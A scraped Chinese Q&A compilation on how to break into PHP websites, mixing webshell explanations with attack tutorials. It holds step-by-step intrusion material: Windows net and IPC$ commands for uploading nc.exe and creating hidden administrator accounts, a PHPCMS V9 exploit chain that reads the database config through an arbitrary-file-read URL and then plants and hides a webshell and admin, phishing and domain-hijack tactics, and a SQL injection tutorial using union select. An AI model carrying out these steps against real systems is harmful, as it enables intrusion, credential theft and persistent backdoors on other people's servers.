php入侵工具

㈠ 如何入侵php网站

很多方法啊，比如：
直接上0day，慢慢渗透，直接去问站长要服务器链接信息～

㈡ webshell是什么

webshell是什么？

顾名思义，"web" - 显然需要服务器开放web服务,"shell" - 取得对服务器某种程度上操作权限。

webshell常常被称为匿名用户(入侵者)通过WEB服务端口对WEB服务器有某种程度上操作的权限,由于其大多是以网页脚本的形式出现，也有人称之为网站后门工具。

2、webshell有什么作用？

一方面，webshell被站长常常用于网站管理、服务器管理等等，根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为WEB

脚本木马，目前比较流行的asp或php木马，也有基于.NET的脚本木马。

对于后者我本人是反对的，毕竟人要厚道。

3、webshell的隐蔽性

有些恶意网页脚本可以嵌套在正常网页中运行，且不容易被查杀。

webshell可以穿越服务器防火墙，由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的，因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。

4、如何防范恶意后门？

从根本上解决动态网页脚本的安全问题，要做到防注入、防暴库、防COOKIES欺骗、防跨站攻击等等，务必配置好服务器FSO权限。

满意望采纳。谢谢。

㈢ 解释解释入侵网站的原理

一、获取口令

这种方式有三种方法：一是缺省的登录界面（ShellScripts）攻击法。在被攻击主机上启动一个可执行程序，该程序显示一个伪造的登录界面。当用户在这个伪装的界面上键入登录信息（用户名、密码等）后，程序将用户输入的信息传送到攻击者主机，然后关闭界面给出提示信息“系统故障”，要求用户重新登录。此后，才会出现真正的登录界面。二是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；三是在知道用户的账号后（如电子邮件“＠”前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；尤其对那些口令安全系数极低的用户，只要短短的一两分钟，甚至几十秒内就可以将其破解。

二、电子邮件攻击

这种方式一般是采用电子邮件炸弹（E－mailBomb），是黑客常用的一种攻击手段。指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的恶意邮件，也可称之为大容量的垃圾邮件。由于每个人的邮件信箱是有限的，当庞大的邮件垃圾到达信箱的时候，就会挤满信箱，把正常的邮件给冲掉。同时，因为它占用了大量的网络资源，常常导致网络塞车，使用户不能正常地工作，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪。

三、特洛伊木马攻击

“特洛伊木马程序”技术是黑客常用的攻击手段。它通过在你的电脑系统隐藏一个会在Windows启动时运行的程序，采用服务器／客户机的运行方式，从而达到在上网时控制你电脑的目的。黑客利用它窃取你的口令、浏览你的驱动器、修改你的文件、登录注册表等等，如流传极广的冰河木马，现在流行的很多病毒也都带有黑客性质，如影响面极广的“Nimda”、“求职信”和“红色代码”及“红色代码II”等。攻击者可以佯称自己为系统管理员（邮件地址和系统管理员完全相同），将这些东西通过电子邮件的方式发送给你。如某些单位的网络管理员会定期给用户免费发送防火墙升级程序，这些程序多为可执行程序，这就为黑客提供了可乘之机，很多用户稍不注意就可能在不知不觉中遗失重要信息。

四、诱入法

黑客编写一些看起来“合法”的程序，上传到一些FTP站点或是提供给某些个人主页，诱导用户下载。当一个用户下载软件时，黑客的软件一起下载到用户的机器上。该软件会跟踪用户的电脑操作，它静静地记录着用户输入的每个口令，然后把它们发送给黑客指定的Internet信箱。例如，有人发送给用户电子邮件，声称为“确定我们的用户需要”而进行调查。作为对填写表格的回报，允许用户免费使用多少小时。但是，该程序实际上却是搜集用户的口令，并把它们发送给某个远方的“黑客”。

五、寻找系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，Windows98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你不上网。还有就是有些程序员设计一些功能复杂的程序时，一般采用模块化的程序设计思想，将整个项目分割为多个功能模块，分别进行设计、调试，这时的后门就是一个模块的秘密入口。在程序开发阶段，后门便于测试、更改和增强模块功能。正常情况下，完成设计之后需要去掉各个模块的后门，不过有时由于疏忽或者其他原因（如将其留在程序中，便于日后访问、测试或维护）后门没有去掉，一些别有用心的人会利用专门的扫描工具发现并利用这些后门，然后进入系统并发动攻击。

现在，你该知道黑客惯用的一些攻击手段了吧？当我们对黑客们的这些行为有所了解后，就能做到“知己知彼，百战不殆”，从而更有效地防患于未然，拒黑客于“机”外。网络的开放性决定了它的复杂性和多样性，随着技术的不断进步，各种各样高明的黑客还会不断诞生，同时，他们使用的手段也会越来越先进。我们惟有不断提高个人的安全意识，再加上必要的防护手段，斩断黑客的黑手。相信通过大家的努力，黑客们的舞台将会越来越小，个人用户可以高枕无忧地上网冲浪，还我们一片宁静的天空。
一，ping

它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在DOS窗口中键入：ping /? 回车，。所示的帮助画面。在此，我们只掌握一些基本的很有用的参数就可以了（下同）。

-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。

-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。

-n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。

说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如“ping IP -t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。

下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统，之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。

（小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix）

至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击……这些就靠大家自己发挥了。

二，nbtstat

该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。

-a 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息（下同）。

-A 这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。

-n 列出本地机器的NETBIOS信息。

当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。

三，netstat

这是一个用来查看网络状态的命令，操作简便功能强大。

-a 查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息，如图4。

这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法：netstat -a IP。

-r 列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。
四，tracert

跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径，这对我们了解网络布局和结构很有帮助。如图5。

这里说明数据从本地机器传输到192.168.0.1的机器上，中间没有经过任何中转，说明这两台机器是在同一段局域网内。用法：tracert IP。

五，net

这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是太强大了，这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令，键入net /?回车如图6。

在这里，我们重点掌握几个入侵常用的子命令。

net view

使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。

net use

把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接（net use \\IP\IPC$ "password" /user:"name"），

建立了IPC$连接后，呵呵，就可以上传文件了： nc.exe \\192.168.0.7\admin$，表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他DOS命令就可以实现入侵了。

net start

使用它来启动远程主机上的服务。当你和远程主机建立连接后，如果发现它的什么服务没有启动，而你又想利用此服务怎么办？就使用这个命令来启动吧。用法：net start servername，如图9，成功启动了telnet服务。

net stop

入侵后发现远程主机的某个服务碍手碍脚，怎么办？利用这个命令停掉就ok了，用法和net start同。

net user

查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。键入不带参数的net user，可以查看所有用户，包括已经禁用的。下面分别讲解。

1，net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。

2，net user abcd /del，将用户名为abcd的用户删除。

3，net user abcd /active:no，将用户名为abcd的用户禁用。

4，net user abcd /active:yes，激活用户名为abcd的用户。

5，net user abcd，查看用户名为abcd的用户的情况

net localgroup

查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中，我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐户就可以控制整个远程主机了。用法：net localgroup groupname username /add。

现在我们把刚才新建的用户abcd加到administrator组里去了，这时候abcd用户已经是超级管理员了，呵呵，你可以再使用net user abcd来查看他的状态，和图10进行比较就可以看出来。但这样太明显了，网管一看用户情况就能漏出破绽，所以这种方法只能对付菜鸟网管，但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员，这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。

net time

这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面，那么也许就用不到这个命令了。但简单的入侵成功了，难道只是看看吗？我们需要进一步渗透。这就连远程主机当前的时间都需要知道，因为利用时间和其他手段（后面会讲到）可以实现某个命令和程序的定时启动，为我们进一步入侵打好基础。用法：net time \\IP。

六，at

这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序（知道net time的重要了吧？）。当我们知道了远程主机的当前时间，就可以利用此命令让其在以后的某个时间（比如2分钟后）执行某个程序和命令。用法：at time command \\computer。

表示在6点55分时，让名称为a-01的计算机开启telnet服务（这里net start telnet即为开启telnet服务的命令）。
七，ftp

大家对这个命令应该比较熟悉了吧？网络上开放的ftp的主机很多，其中很大一部分是匿名的，也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机（一般都是开了21端口的机器），如果你还不会使用ftp的命令怎么办？下面就给出基本的ftp命令使用方法。

首先在命令行键入ftp回车，出现ftp的提示符，这时候可以键入“help”来查看帮助（任何DOS命令都可以使用此方法查看其帮助)。

大家可能看到了，这么多命令该怎么用？其实也用不到那么多，掌握几个基本的就够了。

首先是登陆过程，这就要用到open了，直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可，一般端口默认都是21，可以不写。接着就是输入合法的用户名和密码进行登陆了，这里以匿名ftp为例介绍。

用户名和密码都是ftp，密码是不显示的。当提示**** logged in时，就说明登陆成功。这里因为是匿名登陆，所以用户显示为Anonymous。

接下来就要介绍具体命令的使用方法了。

dir 跟DOS命令一样，用于查看服务器的文件，直接敲上dir回车，就可以看到此ftp服务器上的文件。

cd 进入某个文件夹。

get 下载文件到本地机器。

put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了，如果可以，呵呵，该怎么 利用就不多说了，大家就自由发挥去吧。

delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。

bye 退出当前连接。

quit 同上。

八，telnet

功能强大的远程登陆命令，几乎所有的入侵者都喜欢用它，屡试不爽。为什么？它操作简单，如同使用自己的机器一样，只要你熟悉DOS命令，在成功以administrator身份连接了远程机器后，就可以用它来干你想干的一切了。下面介绍一下使用方法，首先键入telnet回车，再键入help查看其帮助信息。

然后在提示符下键入open IP回车，这时就出现了登陆窗口，让你输入合法的用户名和密码，这里输入任何密码都是不显示的。

当输入用户名和密码都正确后就成功建立了telnet连接，这时候你就在远程主机上具有了和此用户一样的权限，利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的。

到这里为止，网络DOS命令的介绍就告一段落了，这里介绍的目的只是给菜鸟网管一个印象，让其知道熟悉和掌握网络DOS命令的重要性。其实和网络有关的DOS命令还远不止这些，这里只是抛砖引玉，希望能对广大菜鸟网管有所帮助。学好DOS对当好网管有很大的帮助，特别的熟练掌握了一些网络的DOS命令。

另外大家应该清楚，任何人要想进入系统，必须得有一个合法的用户名和密码（输入法漏洞差不多绝迹了吧），哪怕你拿到帐户的只有一个很小的权限，你也可以利用它来达到最后的目的。所以坚决消灭空口令，给自己的帐户加上一个强壮的密码，是最好的防御弱口令入侵的方法。

最后，由衷的说一句，培养良好的安全意识才是最重要的。

㈣ 入侵php网站需注意哪些

要注意你这是违法行为，有可能会坐牢

㈤ iis7.0解析漏洞 php用什么软件检测

本文利用了PHPCMS V9的两个漏洞，一个是读取任意文件漏洞，另一个是模版运行php脚本漏洞。使用到的工具：Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包（包含文中使用到的所有文件、代码和木马）

1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。

例如将data.txt放置在yun..com/j0192/data.txt

2、通过v9漏洞获取配置信息（请参阅：phpcms V9最新读取站点任意文件漏洞）。

/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库，在v9_admin和v9_sso_admin表中添加账号

username字段：admn
password字段：
encrypt 字段：bGV22e
issuper 字段: 1

4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆，然后修改当前用户密码。

用户名：admn
密码：123456

5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存，然后点击footer.html的可视化运行该模版中的脚本，到此时就完成在目标站点生成木马脚本。

6、打开ifeng.com/caches/caches_template/default/wap/data.class.php

用户名：admin
密码：admin

7、隐藏新增加的管理员。

通过木马脚本上传替换/phpcms/moles/admin/admin_manage.php(默认匹配%admn%)，然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员，如果没有则表明我们完成了新加管理员的隐藏。

8、隐藏新增加的关联链接

通过木马脚本上传替换/phpcms/moles/admin/keylink.php((默认匹配%skyhome%))

9、将目标网站的漏洞修复，以防其他黑客入侵。

通过木马脚本上传替换/phpcms/moles/search/index.php

防黑参考:

1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台，修复系统漏洞。

㈥ 已经发现一个网站的漏洞，漏洞是 ：PHPWind v7.5 / v8.0漏洞EXP 咋么， 进行入侵这个网站！！求好心人帮我

用exp能直接入侵，很简单

㈦ 什么是webshell .. webshell是干什么用的

首先普及一下，webshell是网站后台的管理权限。

webshell一大部分是搜索命令：

1、检查命令是否包含斜杠。如果没有首先检查函数列表是否包含所要寻找的命令。

2、如果命令不是一个函数，那么在内建命令列表检查。

3、如果命令既不是函数也不是内建命令，那么扫描列表。

4、如果搜索没有成功，会打印一条错误的消息并且推出。

5、如果搜索成功，shell在一个单独执行环境中执行这个命令。

㈧ php怎么通过黑客手段攻破论坛

现在的主流论坛一般都是两种 一种是dz 另外一种是phpwind

因为Dz的占比特别大，所以安全方面做得也是比较高，现在很难从系统本身找到漏洞了

但是这并不意味着一个人用DZ做论坛就是觉得安全的。那么既然无法从DZ本身入手，我们可以通过哪些途径入手呢？这里我给推荐几种方法。

1. 从服务器入手，首先可以扫描C段，然后看下C段中有哪些可以被入侵的服务器。获得服务器权限之后，就可以通过内网渗透，钓到该服务器下的密码了。

2. 通过域名劫持。劫持他的域名，然后仿照他的网站做一个钓鱼站，吧域名解析到你的钓鱼站上，坐等管理员输入账号跟密码。然后通过后台GetShell

3. 社工——因为DZ现在是腾讯旗下的，然后后台账号会与QQ关联，如果你能获得站长的QQ可以有助于你得到管理员密码哦

   望采纳。

㈨ 求高手回答 PHP网站怎么侵入怎么找后台

第一讲：判断有没注射点
这个很简单，我们最常用的就是看到页面的格式为：index.php?id=2这样的地址，我们知道PHP经常是和MYSQL数据库一起用的，在MYSQL数据库中一定存在一个表，比如setting_table，我们提交上面地址的时候，程序一般上这样处理的：
1、用GET或者POST取我们提交的id=1把这个值传给一个变量id.
2、查询：select * from setting_table where id =$id
上面的语句就是查询的语句，我们代入$id=1就是:
select * from setting_table where id=1
这话是没什么问题的，会取出id为１的信息进行显示给我们，所以我们就能看到正常的页面。 －－－－－－－－－－－－－－
看我们是怎么判断的：
１、我们提交id=1 and 1=1
看看这个是什么效果，这里的$id就是1 and 1=1，我们看看是什么样子的：
select * from setting_table where id =1 and 1=1
这个语句加了一个and 语句，后面是1=1是肯定成立的，所以就不影响上面语句的成立，它还会取出id=1的信息进行显示给我们，所以我们看到的还是原来的正常页面。
２、我们提交 id =1 and 1=2
看看这个是什么效果，这里的$id就是 1 and 1=2,我们看看在ＳＱＬ中怎么执行
select * from setting_table where id =1 and 1=2
分析下这个语句，前面还是一样的，只是最后加了个and 1=2，这个自然不成立啦！又因为是and连接的，so自然找不到符合条件的啦！只能回显给我们一个错误或者空白的页面拉～！！
上面就是一般我们采用and 1=1 & and 1=2来判断的基本原来，但是这里还要注意几点，如下：
１、程序处理的时候必须是where id =$id 而不是where id=$id，这个单引号是很不一样的，怎么不一样，以后再说。。
２、程序对我们提交的参数没有处理或者处理的不好，导致我们可以直接提交，如果程序多我们提交的参数进行处理，又会不一样，也是后话！
第二讲：快速判断ＭＹＳＱＬ版本
前提：你得到一个注射点，比如：news.php?id=1
这个点是你找到的，提交and 1=1 和and 1=2返回的是不同的。
我们就可以这样来猜ＭＹＳＱＬ的版本了。。步骤如下：
１、提交/news.php?id=1/*!40000%20s*/如果返回正常就说明ＭＹＳＱＬ版本在4000版本以下，你可以依次调节最高位的数字，比如我改为３９０００提交，如果再正常，就提交３８０００....直到返回错误提示，最后固定的那个就是ＭＹＳＱＬ的版本了。。
下面是我提交测试时的过程（只写ＭＹＳＱＬ版本）
４００００（＋）－－３９０００（＋）－－３８０００（＋）－－３７００００（－）－－３７９００（＋）－－３７８００（＋）－－３７７００（－）－－结束！！
得到ＭＹＳＱＬ版本是３７７００。
２、一般我们不去猜具体的版本，我们只关系ＭＹＳＱＬ是不是在４.０以上，以为只有４.０以上的ＭＹＳＱＬ才支持ＵＮＩＯＮ查询，以下是不支持的，所以我们经常只用/*!40000%20s*/看看是不是４.0以上的版本。
ＰＳ：/*!40000%20s*/这里的/*!......*/是mysql里一种特殊的注释方式，也没什么好奇怪的，记得怎么用就可以了～～
第三讲：PHP注射怎样得到表名。。
正准备写，看到有人问到了，就总结下，算第三讲吧！ Quote:
Originally posted by spirit at 2006-5-16 05:57 PM:
看了好多 文章了 ....眼睛都花了
里面涉及到的东西也比较全面
不过 一直不知道怎么搞出 表
总不能直接搞 去 字段吧..？？
一个一个来啊
数据库 表 字段 值...
这个逻辑我认为是对的 ....
对了这里还是 感 ...
表确实不好搞，不像ASP可能直接暴出来，PHP到现在还是暴不出来的，我们一般有两个办法：
1、靠经验猜：比如大家常用的admin,user,news,vote,wenzhang,guanliyuan等等，没办法的事。。
2、暴代码查看：用Load_file暴出文件代码，就可以看到数据插值到什么表，什么字段了，这样就很明白了，但是load_file也很有技巧的。。以后再讲。。
--------------------------------------------
具体说一下吧：
1、这个没什么好说的，直接猜就可以了，比如你看到一个注射点，类似news.php?id=1这样的点，你用union查询得到具体的字段，比如这样：news.php?id=1 and 1=2 union select 1,2,3,4 是成立的，
你就可以这样猜：news.php?id=1 and 1=2 union select 1,2,3,4 from admin/*如果存在admin表，就会返回真，否则就不存在表admin，其他和这个一样的。
2、这个就有点终极了，比如你得到他的绝对路径，可以load_file(file path)出文件的代码，比如你暴得管理员登陆的页面，就能看到他其中的SQL语句，可以看到他是从哪个表了取的值了，是吧》》
原理就是这样的，多多思考，有什么心得，希望能分享。。。。
第四讲：有无引号的差别
很多朋友都对那个引号的作用不很了解,认为加引号和不加是一样的效果..
引号（包括单、双）对我们的注射是有着很大的影响的，这里主要还是和magic的状态有关，当这个magic为off的时候倒没什么影响，当这个magic为on的时候就大不一样了。。
小知识：magic为on时，为自动为我们提交的单引号（‘），双引号（“），（\），空格（ ）等加上转意 符号\，使得上的都变成（\’），（\”），（\\）等，这就给我们注射太来麻烦，例子如下。
一、第一个例子（没引号）
如果语句如下：
QUOTE:
select * from news where newsid=$id
1、magic为off时情况
为off时不会处理我们提交的数据信息，假设一个SQL语句是这样的；
我们在URL中可以提交$id的值，就像我们前面说的给$id为：
$id=1 union select 1,2,3,4 from admin
就基本上可以取得我们想要的数据了。
2、magic为on时情况
这时没什么区别，因为我们没有提交敏感的字符
二、第二个例子看它处理的SQL语句：
QUOTE:
select * from news where newsid=$id
这时要想成功利用$id这个没过滤的参数，我们可以提交如下：
$id=1’ union select 1,2,3,4 from admin/*
开始要有一个（）来闭合前面的，后面再加一个/*注释掉后面的
1、magic为off时情况
如果magic为off，我们可以直接提交，成功利用
2、magic为on时情况
如果magic为on，那么我们提交的语句变成：
$id=1\’ union select 1,2,3,4 from admin/*
看，就没办法利用了（尽管有漏洞）